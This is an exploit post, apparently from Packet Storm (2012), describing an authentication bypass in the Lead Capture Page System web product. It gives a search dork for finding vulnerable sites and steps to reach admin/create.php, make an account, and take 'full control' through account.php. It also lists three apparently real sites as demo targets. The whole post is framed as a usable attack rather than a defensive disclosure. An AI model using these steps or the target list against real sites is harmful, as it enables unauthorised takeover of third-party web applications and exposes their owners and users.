Lead Capture Page System suffers from an account creation / authentication bypass vulnerability.
e91264eb3ec7199a5ea157bda4439c1a09faddfad6adb7ee10bce2850bd58932(Lead Capture Page System) Authentication Bypass Vulnerability
Software : Lead Capture Page System
Date : 1/12/2012
Vendor : http://leadcapturepagesystem.com
Get App. : http://leadcapturepagesystem.com/order.php?id=1
Price : $235
Dork : intext:"Powered By Lead Capture Page System"
Author : ITTIHACK
Home : http://ittihack.com
Description:
By this exploit, you can bypass admin's login page, follow these steps to learn more:
1) Use the dork above to find yours.
2) Go to http://site/admin
Now you will be redirected to login page: http://site/admin/login.php, you are required to login, just change the link above by this:
3) replace login.php with create.php --> http://site/admin/create.php
4) Fill up the blanks, and Click on: Create Account
5) Now change the URL to: http://site/admin/account.php
6) That's all, full control XD
Demo Sites: http://goldengatetowealth.org/admin ---> http://goldengatetowealth.org/admin/create.php
http://instantmoneynetwork.com/admin ---> http://instantmoneynetwork.com/admin/create.php
http://silver2up.com/admin ---> http://silver2up.com/admin/create.php
#Greatz to: ___ ____ ____
#````______/```\__//```\__/____\
#``_/```\_/``:```````````//____\
#`/|``````:``:``..``````/ Reinie \
#|`|`````::`````::``````\````````/
#|`|`````:|`````||`````\`\______/
#|`|`````||`````||``````|\``/``|
#`\|`````||`````||``````|```/`|`\
#``|`````||`````||``````|``/`/_\`\
#``|`___`||`___`||``````|`/``/````\
#```\_-_/``\_-_/`|`____`|/__/``````\
#````````````````_\_--_/````\`````/
#```````````````/____```````````/
#``````````````/`````\`````````/
#``````````````\______\_______/
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed